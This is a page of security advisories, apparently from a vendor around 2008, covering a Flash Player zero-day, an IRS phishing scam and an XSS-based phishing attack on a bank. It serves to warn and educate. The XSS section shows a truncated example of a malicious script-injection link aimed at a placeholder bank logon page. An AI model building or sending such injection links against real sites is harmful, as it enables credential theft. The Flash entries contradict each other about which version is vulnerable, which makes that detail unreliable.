Security Alerts

ADOBE FLASH PLAYER ZERO-DAY VULNERABILITY

Simply Put: Simply Put: Adobe’s Flash Player has a new, zero-day vulnerability. "Zero-day" means the attack is being actively exploited on the Internet and there is not a patch available. Adobe Flash Player is used to display flash files (.swf) in web pages and these files are normally seen as movies or animations. The vulnerability can be used to run malicious code on a user’s machine without notification or permission. Gladiator feels this issue is extremely critical.

Attack Details: There are no details currently available from Adobe. The reported vulnerable version is 9.0.124.0 but other versions may also be vulnerable.

Countermeasures: Users should be reminded not to visit untrusted websites nor click on links to pages they have never visited. Keep checking the links below for information on when a patch will be available. Once a patch is available, be sure to have all users in the organization install it. Check all servers and critical workstations and uninstall Flash if possible.

If you are using Mozilla Firefox, Gladiator suggests downloading the NoScript plugin. NoScript will block all scripts and active content unless specifically allowed for each site. This will prevent Flash files from running without permission. The link is included below for your convenience. Gladiator is not aware of an Internet Explorer plugin with these capabilities.

Reference Links:
Security Focus Advisory
Secunia Advisory

ADOBE FLASH PLAYER ZERO-DAY VULNERABILITY [RESOLVED]

Resolution: Adobe has released more information on this vulnerability. This bug was fixed in Adobe Flash Player 9.0.124.0; however, prior versions of Flash Player are still vulnerable. Therefore, Gladiator recommends all institutions upgrade to Adobe Flash Player 9.0.124.0 as soon as possible.

Reference Links:
Adobe Flash Player Latest Version

ECONOMIC STIMULUS REFUND IRS PHISHING ADVISORY

Simply Put: A new phishing scam is currently making its way around the internet. Phishers are sending out email which appears to come from the IRS with information on your 2008 Economic Stimulus Refund. The email requests that you fill out an online form with your personal information so the check can be directly deposited in your bank account. The link to the form is included in the email. This email is not from the IRS, and is designed to steal a person’s identity.

Attack Details: Hoax-slayer.com has examples of both the email and the form in its advisory (linked below). Some emails also include malicious code embedded in the email. All emails matching this description should be deleted when received. Do not read the email or click on any embedded links.

Countermeasures: Users should be notified that these emails are circulating the internet. Do not open or respond to any emails asking for personal information. If an email appears to come from a known source, browse to the company’s website to double-check the authenticity of the information. Type in the company’s address manually, do not rely on embedded links.

Reference Links:
hoax-slayer.com advisory
IRS advisory

NEW PHISHING ATTACK

Simply Put: A new phishing attack has been targeted to customers of a financial institution in Italy. This attack is unique because it links to the institution’s actual website instead of using a fake website like most phishing attacks. Once the customer clicks on the link in the email, they are directed to the institution's website to log on. However, an attack embedded within the link allows the attacker to capture the username and password as the user logs in. The username and password are recorded by the attacker for future use.

Let’s go through an example of what this might look like. A financial institution’s website address is:

https://www.myinstitutionname.com

and the logon page for the institution is:

https://www.myinstitutionname.com/logon.asp.

If this page were vulnerable to XSS an attacker could send out a link that looks like:

https://www.myinstitutionname.com/logon.asp?user=%20$21script%34source%…

Notice how the domain name is always the same. Most users would only check the target domain, which is the institution’s website, so they would inherently trust this link. If clicked, the additional code at the end of the link would run in the browser with the rest of the financial institution’s website.

Attack Details: The attack uses a cross-site scripting (XSS) vulnerability found in the institution’s website. This vulnerability allows the attacker to use a link to the institution’s actual website (regardless of SSL certificates) and alter the link to include new code, such as malicious javascript or HTML. This code is loaded in the client’s browser with the same trust level as the financial website they are visiting. This specific attack injects an IFRAME which opens a new website from Taiwan directly onto the institution’s existing website. Screen shots of this specific attack are included in the Netcraft article below.

Countermeasures: This attack is of concern because most anti-phishing material suggests looking at the domain name in the link to see if it is legitimate, or to check for the SSL “lock” at the bottom of the browser window while at the site. Since the domain name and the SSL certificate in this attack belong to the bank, many users could be tricked into putting themselves at risk. Gladiator suggests that all financial institutions review their anti-phishing notices on their websites. They should include a warning to never log in to a secure website by clicking on ANY link in an email, even one with a correct domain name. Users should instead type the domain name into the browser or use a shortcut they have set up. If a financial institution runs its own website and is concerned about vulnerabilities, it can contract with an application vulnerability assessment firm to check its site. If you have any questions, please contact the Gladiator Security Operations Center at 678.461.4620 or soc@gladtech.net.

Reference Links:
Web Application Security Consortium
Netcraft